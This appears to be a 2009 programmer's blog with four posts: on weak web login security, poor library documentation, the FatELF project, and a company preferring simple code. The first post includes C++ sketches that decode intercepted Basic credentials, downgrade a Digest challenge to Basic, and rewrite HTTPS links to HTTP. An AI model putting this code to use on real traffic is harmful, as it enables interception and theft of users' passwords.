Tuesday, November 24, 2009

Malicious hackers are not out there

Security as it is today is an illusion. What? How could I say that, I'm not serious, am I?

Most people today do not understand what security is or is not about, as evidenced by so many works of modern fiction centering on a plot where the terrorists/foreign government/aliens "bug" a server, a cable, or a satellite. Today's technology is supposed to prevent attacks involving any layer in the middle being bugged. Besides not understanding what modern security is capable of, many who work with it do not understand what it is not capable of.

A quick scan of the source code of many projects will turn up code which fails even textbook-level security principles. I even see major projects with code comments noting that a more secure hash or nonce generator or something similar is needed, all of which can be found in modern textbooks.

It is shocking how many online services or applications one can install (forums, webmail, blogs, wikis, etc.) have insecure logins. Nearly all of them take user login credentials in plain text, allowing anyone between the user's computer and the website's application to steal the passwords.

It is sad that nearly all sites use a custom login scheme that can be buggy and/or receive login credentials unencrypted, considering that HTTP, the protocol the communication runs over, supports secure logins itself. HTTP login is rarely used though, because it lacks a simple way to log out (why?) and cannot be made to look pretty without using AJAX, which is why the vast majority of site creators avoid it.

The HTTP specification actually describes two methods of login for "HTTP 401", one called "Basic Authentication", and another called "Digest Authentication". The former transmits login credentials in what is effectively plain text (merely Base64 encoded), while the latter sends a hash computed from the password and a server-supplied nonce instead of the password itself. Most sites that avoid the worry of properly creating a custom login scheme and resort to HTTP 401 generally use Basic Authentication. Historically, the reason is that most developers of HTTP servers and clients have been too stupid to figure out how to do Digest properly, which is surprising considering it is such a simple scheme. IIS and IE didn't have it done properly till relatively recently. Apache historically has had issues with it. Qt's network classes handled it improperly until recently. I'm also told Google Chrome currently has some issues with it.
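As a rough sketch of why Basic Authentication protects nothing on the wire: the credentials travel as the Base64 encoding of "user:password", which anyone who sees the header can reverse. The function names below are made up for illustration, and the parsing is simplified (it assumes the scheme is spelled exactly "Basic " and does not validate the Base64 input).

```cpp
#include <cstdint>
#include <string>

// Decode standard Base64. Stops at '=' padding or at the first character
// outside the alphabet (a simplification, no error reporting).
std::string base64Decode(const std::string &in)
{
  static const std::string alphabet =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  std::string out;
  std::uint32_t buffer = 0;
  int bits = 0;
  for (char c : in)
  {
    const std::string::size_type value = alphabet.find(c);
    if (value == std::string::npos) break; // Padding or invalid input
    buffer = (buffer << 6) | static_cast<std::uint32_t>(value);
    bits += 6;
    if (bits >= 8) // A full byte is available, emit it
    {
      bits -= 8;
      out.push_back(static_cast<char>((buffer >> bits) & 0xFF));
    }
  }
  return out;
}

// Hypothetical helper: given the value of an "Authorization" header, return
// "user:password" if it carries a Basic credential, or "" otherwise.
std::string decodeBasicCredentials(const std::string &headerValue)
{
  const std::string prefix = "Basic ";
  if (headerValue.compare(0, prefix.size(), prefix) != 0) return "";
  return base64Decode(headerValue.substr(prefix.size()));
}
```

Feeding it the header value "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" gives back "Aladdin:open sesame". No key or secret is involved anywhere, which is the whole problem.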

However, even if one used Digest as the login mechanism on their website, it can easily be subject to a man-in-the-middle attack, because the HTTP spec also allows passwords to be sent unencrypted.

The following diagram illustrates it:

Since the request for authentication comes from the server and not the client, the machine in the middle can change that request to the insecure variant.
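To show how little the tampering involves, here is a minimal sketch of the one step that matters: swapping a Digest challenge for a Basic one in a response header line. The function name is hypothetical and the parsing is deliberately naive (it assumes the header is spelled exactly as shown and that the realm is a simple quoted string).

```cpp
#include <string>

// Hypothetical helper: given one response header line as seen by a machine in
// the middle, replace a Digest challenge with a Basic one, keeping the realm.
std::string downgradeChallenge(const std::string &headerLine)
{
  const std::string digestPrefix = "WWW-Authenticate: Digest ";
  if (headerLine.compare(0, digestPrefix.size(), digestPrefix) != 0)
    return headerLine; // Not a Digest challenge, pass it through untouched

  // Keep realm="..." so the login prompt still names the same site
  std::string realm = "realm=\"\"";
  const std::string realmKey = "realm=\"";
  const std::string::size_type start = headerLine.find(realmKey);
  if (start != std::string::npos)
  {
    const std::string::size_type end = headerLine.find('"', start + realmKey.size());
    if (end != std::string::npos)
      realm = headerLine.substr(start, end - start + 1);
  }
  return "WWW-Authenticate: Basic " + realm;
}
```

The client never asked for Digest in the first place, so it has no way to tell that the challenge it received is not the one the server sent.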

So of course the next level up is HTTPS, which does HTTP over SSL/TLS, which is supposed to provide end to end security, preventing man in the middle attacks. This level of security makes all those fiction stories fail in their plot. It also is supposed to keep us safe, and is used by websites for processing credit card information and other sensitive material.

However, most users just type "something.muffin" into their browser instead of prefixing it with http:// or https://, and the browser will default to http://. That again means the server has to initiate the secure connection. Since this too is a system which has both secure and insecure methods of communication, the same type of man-in-the-middle attack as above can be performed.

The following diagram illustrates it:

Web servers are generally the ones that initiate the redirection to an HTTPS page, and that redirection can be modified by the machine in the middle. Any URL within a page which begins with https:// can be rewritten as well. For example, https://something.muffin can be changed to http://something.muffin:443 by an attacker in the middle, who can then proceed with the attack as described above.
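The rewrite described above amounts to a plain text substitution. The following is only a sketch under simplifying assumptions: the function name is invented, URLs are found by searching for the literal text "https://", and the host is taken to end at the first slash, colon, quote, or whitespace.

```cpp
#include <string>

// Hypothetical helper: rewrite every https://host in a page to
// http://host:443, leaving an explicitly given port alone.
std::string rewriteSecureLinks(const std::string &page)
{
  const std::string secure = "https://";
  std::string out;
  std::string::size_type pos = 0;
  for (;;)
  {
    const std::string::size_type hit = page.find(secure, pos);
    if (hit == std::string::npos)
    {
      out.append(page, pos, std::string::npos); // Copy the remainder
      break;
    }
    out.append(page, pos, hit - pos); // Copy everything before the URL

    // The host runs until the first character that cannot be part of it
    const std::string::size_type hostStart = hit + secure.size();
    const std::string::size_type hostEnd =
      page.find_first_of("/:\"'<> \t\r\n?#", hostStart);
    const bool atEnd = (hostEnd == std::string::npos);
    const std::string host =
      page.substr(hostStart, atEnd ? std::string::npos : hostEnd - hostStart);

    out += "http://" + host;
    const bool hasPort = !atEnd && page[hostEnd] == ':';
    if (!hasPort) out += ":443"; // Keep pointing at the original port
    pos = atEnd ? page.size() : hostEnd;
  }
  return out;
}
```

Nothing in the page itself tells the browser that the links used to be secure, so the only remaining defense is the user noticing the missing padlock.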

Of course users should be looking for padlocks and green labels and similar in their browser, but how many do so? Since most sites people visit aren't running in secure environments, do you expect them to really notice when some page which is supposed to be secure isn't? Do you expect users to be savvy about security when most developers aren't?

The amount of data which should be transferred securely but isn't is mind boggling. I see websites create a security token over HTTPS, but then pass that token around over HTTP, allowing anyone in the middle to steal it. I see people e-mail each other passwords to accounts on machines they manage all the time. I see database administrators log in to phpMyAdmin running on servers with their root passwords sent in plain text. People working on projects together frequently send each other login credentials over forums or IRC in plain text.

Anyone managing a hub somewhere on the vast internet should be able to log tons and tons of passwords. Once a password to someone's e-mail or forum account is obtained, that account can be scanned for even more passwords. Also, I see many users save root/admin passwords in plain text files on web servers. If one managed to get into their account by nabbing their password to it, a simple scan of the user's files will quite often yield root as well. Even if not, once access is gained to a machine, privilege escalation is the norm as opposed to the exception, because server administrators quite often do not keep up with security updates, or are afraid to alter a server that they finally got working.

Careful pondering would show our entire infrastructure for communication is really a house of cards. It wouldn't be that hard for a small team with a bit of capital to set up free proxy servers around the world, offer free wi-fi at a bunch of hotspots, or start a small ISP. So the question we have to ask ourselves is: why are we still standing with everything in the shaky state it's in? I think the answer is simple: the malicious hackers really aren't out there. Sure, there are hackers out there, and some of them do wreak a bit of havoc. But it seems no one is really interested in making trouble on a large scale.

Mostly the hackers you hear about are people in a competition, or doing research, or those "security hackers" who have gone legit and want to help you secure your business. It's funny how many times I've heard a story about how some bigwig at a company goes to some sort of computer expo and runs across a table or booth of security "gurus". The bigwig asks how the security gurus can help his business, and they respond by asking if the bigwig owns a website. Once the bigwig mentions the name of his site, one guru pulls out his laptop and shows the bigwig the site with it defaced in some way. The bigwig panics and immediately hires them to do a whole load of nothing. Little does he realize he was just man-in-the-middle'd.

Tuesday, November 10, 2009

We got excellent documentation!

Ever try to work with a library you've never dealt with before? How do you approach the task? Do you try to find another program which uses the library and cannibalize it? Get someone who already knows how to use it to teach you? Find a good example? Or just trudge your way through and get something that barely works?

I personally would like to have some good documentation which tells me exactly what I need to do to get the job done. Something which I can rely on to tell me everything I need to know, and to avoid any particular pitfalls.

Except most of the time documentation is written by people who would be better off in some other profession. Like terrorist interrogators. Or perhaps the Spanish Inquisition.

Although when you talk to people about the documentation for their library, they act like the documentation is two stone tablets brought down from heaven with sacred commandments written on them. Perhaps it is. But in the same fashion, the documentation is just as mysterious to anyone who hasn't spent years studying the library to decipher its true meaning.

For many libraries, I have spent hours poring over their documentation, to come up with like 5-10 lines of code to do what I needed to do. 10 hours for 10 lines of code? A bit much I think. Why can't people make documentation for those not familiar with the library, so they can get all the basic tasks done, and provide good reference for anything more advanced? Sometimes the documentation is so completely unhelpful that I have to resort to the source code, or scour the internet for something to help me. This is completely unacceptable.

Let's look at some of the various types of offenders.

Doxygen equals documentation.

This is the kind of documentation written by those obnoxious programmers who don't want to write any documentation at all. They run a script on their source code which creates a set of HTML pages with a list of all the files in the library and a list of functions and classes, all nicely interlinked. It also pulls out the comments about each function and clearly displays them. Sure, it makes it easy to jump back and forth in a browser between various internals of the source. But it really gives no insight on how to use the library. If the library is written really cleanly, and commented well, perhaps this helps, but usually those creating the library didn't put any more effort into it than they put into creating their documentation.

Really, honest, there's documentation!

Then there are those that try to convince you they have documentation. You have a set of text files, or an HTML file, or a PDF or whatever which tells you how amazing the library is, and tells you all the wonderful things the library is capable of. They'll even give you notable examples of programs using their library. You'll have a great comparison chart of why this library is better than its competitors. You'll even get some design documentation, rationale, and tips on how you can expand the library further. Good luck finding a single sentence which actually tells you how to use it.

We got you the bare essentials right over here, or was it over there?

Then you have the documentation which can never give you any complete idea. Sure, just use this function and pass it these six arrays all filled out. Don't worry about what to put in them, those arrays are explained on another page. Oh yeah this array can be used for a trillion different things, depending on which function you use it with, so we'll just enumerate what you may want to use it for. You may get more information looking at these data types though. Before you know it, you're looking at 20 different pages trying to figure out how to bring together the information to use a single function.

I see your warrant, and I raise you a lawyer!

This kind of documentation seems to be written by those that don't actually want you to use their library and are all evasive about it. Every time you think the documentation is going to comply and actually tell you something useful, you're faced with something that isn't what you wanted. You'll get a bunch of small 4 line examples, each of which does something, but no explanation as to what they're doing exactly. You'll even be told here and there some cryptic details about what a function supposedly does. Good luck figuring out how to use anything.

I see your lawyer, and I'll bury you with an army of lawyers!

This is one of the worst offenders, and one that big companies or organizations generally pull. You'll get "complete working examples", and a lot of them. The examples will be thousands of lines long and perform a million other things besides what the library itself does, let alone the function you just looked up. Good luck finding what you need amidst all the noise. The Deitel & Deitel line of "How to Program" books that many colleges and universities use plays the same game: create enough information overload in the simplest of cases to force you to switch to a major in marketing.

I'm sorry your honor, I didn't realize I didn't turn over the last chapter.

This kind of documentation isn't so bad. You'll get some good notes on how to do all the basic stuff the library is capable of. But any function or class with any sort of complexity is completely missing, and you'll have to refer to the source code. But I guess the authors don't know how to put the trickier things into words, at least not like the easier stuff.

I think that about sums it up. There are some libraries out there with good documentation, but usually it's one of the kinds described above. Anyone else feel the same way?

Friday, November 6, 2009

FatELF Dead?

A while back, someone came up with a project called FatELF. I won't go into the exact details of all it's trying to accomplish, but the basic idea was that just as Mac OS X has universal binaries using the Mach-O object format which can run on multiple architectures, the same should be possible with software for Linux and FreeBSD, which use the ELF object format.

The creators of FatELF cite many different reasons why FatELF is a good idea, which most of us probably disagree with. But I found it could solve a pretty crucial issue today.

The x86 line of processors, which is what everyone uses for their home PCs, recently switched from 32-bit to 64-bit. 64-bit x86, known as x86-64, is backwards compatible with the old architecture. However, programs written for the new one generally run faster.

x86-64 CPUs contain more registers than traditional x86-32 ones, so a CPU can juggle more data internally without offloading it to much slower RAM. Also, most distributions offered precompiled binaries designed for a very low common denominator, generally a 486 or the original Pentium. Programs compiled for these older processors can't take advantage of many of the improvements that have been made to the x86 line in the past 15 years. A distribution which targets the lowest common denominator for x86-64, on the other hand, is targeting a much newer architecture, where every chip already contains MMX, SSE, similar technologies, and other general enhancements.
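One way to see the difference in baseline is to ask the compiler what it is targeting. This is only a sketch: the function names are invented, and it relies on the predefined macros of GCC/Clang (`__x86_64__`, `__i386__`, `__SSE2__`) and MSVC (`_M_X64`, `_M_IX86`), so other compilers will simply report "other".

```cpp
#include <string>

// Report which x86 flavor this translation unit was compiled for
std::string compiledTarget()
{
#if defined(__x86_64__) || defined(_M_X64)
  return "x86-64";
#elif defined(__i386__) || defined(_M_IX86)
  return "x86-32";
#else
  return "other";
#endif
}

// Report whether the compiler was allowed to assume SSE2 is present.
// SSE2 is part of the x86-64 baseline, so a 64-bit build always may;
// a 32-bit build aimed at a 486 or original Pentium may not.
bool compiledWithSse2()
{
#if defined(__SSE2__) || defined(_M_X64)
  return true;
#else
  return false;
#endif
}
```

On a typical distribution, a default 64-bit build would report "x86-64" with SSE2 available, while a 32-bit build for the old common denominator would report "x86-32" without it, unless extra compiler flags were passed.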

Installing a distribution geared for x86-64 can mean a much better computing experience for the most part. Except certain programs unfortunately are not yet 64 bit ready, or are closed source and can't be easily recompiled. In the past year or two, a lot of popular proprietary software was ported by its vendors to x86-64, but some which is important for business fails completely under x86-64, such as Cisco's Webex.

x86-32 binaries can run on x86-64, provided all the libraries they need are available on the system. However, many distributions don't provide x86-32 libraries on their x86-64 platform, or they provide only a couple, or provide ones which simply don't work.

All these issues could be fixed if FatELF were supported by the operating system. A distribution could provide an x86-64 platform, with all the major libraries containing both 32 and 64 bit versions within. Things like GTK, Qt, cURL, SDL, libao, OpenAL, etc. We wouldn't have to worry about one of these libraries conflicting when installing two variations, or simply missing from the system.

It would make it easier on those on an x86-64 platform, knowing they can run any binary they get elsewhere without a headache. It would also ease deployment issues for those that don't do anything special to take advantage of x86-64, and just want to pass out a single version of their software.

I as a developer have to have an x86-32 chroot on all my development systems to make sure I can produce 32 bit binaries properly, which is also a hassle. All too often I have to jump back and forth between a 32 bit shell to compile the code, and a 64 bit shell where I have the rest of my software needed to analyze it, and commit it.

But unfortunately, it now seems FatELF is dead, or on its way there.

I wish we could find a fully working solution to the 32 on 64 bit problem that crops up today.

Thursday, November 5, 2009

They actually want bad code

So I was in this huge meeting yesterday, and I got the shock of my life.

We were discussing how we're going to go about creating and marketing a new program which will be deployed on the servers of our clients. When I suggested I be the one to take charge of the program design and creation, and handpick my team of the best programmers in the company to write the code, I was shot down. The reason? They don't want the program to be written correctly. They don't want the code written by people who know what they're doing.

That had me completely flabbergasted. I needed more details. I asked what exactly was wrong with the way I did things? With creating the program properly? Our chief executive in charge of marketing dependability and quick maintenance boiled it down for me.

The problems with me writing the code are as follows:
No matter which language(s) we choose to build the program with, whether it be C++, PHP, C#, or something else, I'm going to make sure we use the classes and functions provided by the language most fit for use in our program. Every single function will be as clear and minimalistic and self contained as possible. And this is evil in terms of dependability and quick maintenance.

If for example we used C# with .NET and I found just the perfect class out of the few thousand provided to fit the job, and it turns out down the line some issue crops up, apparently, they can't complain to Microsoft. Microsoft will tell them no one uses that class, and it is probably buggy, and they'll put it on a todo list to be looked at several months down the line.

If I use any function or class in C++ or PHP outside of the most basic 10-20 ones that dime-a-dozen programmers learn right away, they won't be able to get someone outside our group of professionals to review and fix it.

Basically, they want the program written only using classes, functions, arrays, loops, and the least amount of standard library usage. Because a random programmer most likely will barely be familiar with anything contained within the standard library.

They would prefer reinventing built-in functions, even having them written incorrectly in terms of output correctness and running time, since it means a programmer will never need to look in a manual to be able to understand a piece of code and fix it. That is important, apparently, as most can only figure out what is wrong with the logic directly in front of them, and then try to brute force correct output.

But it doesn't even stop at good code making good use of the language, instead of reinventing the wheel.

Quite often in our existing projects, I go to look at a bug report, and notice some function which works incorrectly, and in the process of fixing it, I condense the logic and make the code much better. Let me give an example.

This is very similar to an existing case we had. The code was as follows:

//This function creates a log on Sunday, Tuesday, Thursday
//It takes as input an integer with a value of 1-7, 1 being Sunday.
void logEveryOtherDay(int dayOfTheWeek)
{
  if (dayOfTheWeek == 1) { /* ... log Sunday ... */ }
  else if (dayOfTheWeek == 3) { /* ... log Tuesday ... */ }
  else if (dayOfTheWeek == 5) { /* ... log Thursday ... */ }
}

The problem reported was that logs from Sunday missed the ----- separator before them, and they'd want a log on Saturday too if run then. When fixing it, the code annoyed me, and I quickly cleaned it up to the following:

//This function takes an integer and returns true if it's odd, and false if even
static bool isOdd(int i) { return(i&1); }

static const char *daysOfTheWeek[] = {
  0, //Begin with nothing, as we number the days of the week 1-7
  "Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"
};

//This function creates a log on Sunday, Tuesday, Thursday, Saturday
//It takes as input an integer with a value of 1-7, 1 being Sunday.
void logEveryOtherDay(int dayOfTheWeek)
{
  if (isOdd(dayOfTheWeek)) //Logging isn't done on even days
  {
    /* ... write the ----- separator, then log daysOfTheWeek[dayOfTheWeek] ... */
  }
}

I think it should be obvious my code has much cleaner logic, and should be easy for any reasonable programmer to follow. I frequently do things like this. I even once went to look at a 2000 line function which had roughly a dozen bug reports against it, was a total mess, and ran really, really slowly. Instead of hunting for the cause of each issue in it, I decided to scrap it. I created 2 helper functions, one 3 lines, the other 5, and rewrote the body of the function from 2000 lines to roughly 40. Instead of many nested ifs and several loops, we now had a single if and else which did exactly what they needed to, and called one of the two helper functions as needed where the real looping was done. The new function was profiled to run an order of magnitude faster, and it passed all the test cases we designed, where the original failed a few. It now also contained 2 new features which were sorely lacking from the original. It was now also much easier to read it for correctness, as much less was going on in any section of the code.

But as this executive continued to tell me, what I did on these occasions is evil for an average programmer.

They can't comprehend a small amount of code doing so much. They can't understand what isOdd() does or is trying to do, unless they actually see its source. Its source of "return(i&1);" is just too confusing for them, because they don't know what "&1" means, nor can they comprehend how it can return true or false without containing an elaborate body of code. They can't just take the comment at face value that it does what it says it does. They are also frightened when they review different versions of a file to trace a bug and see that a ton of code just disappeared at some point, yet the commit log says the code does more.
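For anyone who really hasn't met "&1" before, a small sketch of what it does: "&" is a bitwise AND, and ANDing with 1 keeps only the lowest binary digit of the number, which is 1 for odd values and 0 for even ones. The second function below is a hypothetical long-hand version written purely for comparison.

```cpp
// Keep only the lowest bit of i: it is set for odd numbers, clear for even
static bool isOdd(int i) { return (i & 1) != 0; }

// Hypothetical long-hand equivalent, spelled out with the remainder operator
static bool isOddLongForm(int i)
{
  if (i % 2 == 0)
  {
    return false; // Divides evenly by 2, so it is even
  }
  else
  {
    return true; // Leaves a remainder, so it is odd
  }
}
```

For the day numbers 1-7 used above, both versions return true for 1, 3, 5, and 7 (Sunday, Tuesday, Thursday, Saturday) and false for the rest.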

So to sum it up, they don't want me, or programmers like me, working on any code that is to be deployed on a client's server. When a client from Africa or South America calls us up with a problem, they don't want to fly one of our good programmers down there to look at it. They want to make sure they can hire someone on site in one of those places to go and look at the problem and fix it quickly. That apparently can't happen when there's no guarantee of being able to hire a good programmer there on short notice, and other kinds of programmers can't deal with good code or standard library/class usage.

This mentality makes me very scared, although I guess it does explain to some extent why I find the innards of many rather large open source projects which are used commercially to be filled with tons of spaghetti logic, and written in a manner which suggests the author didn't really know what they were doing, nor should they be allowed to write code.

Anyone experience anything similar? Comments?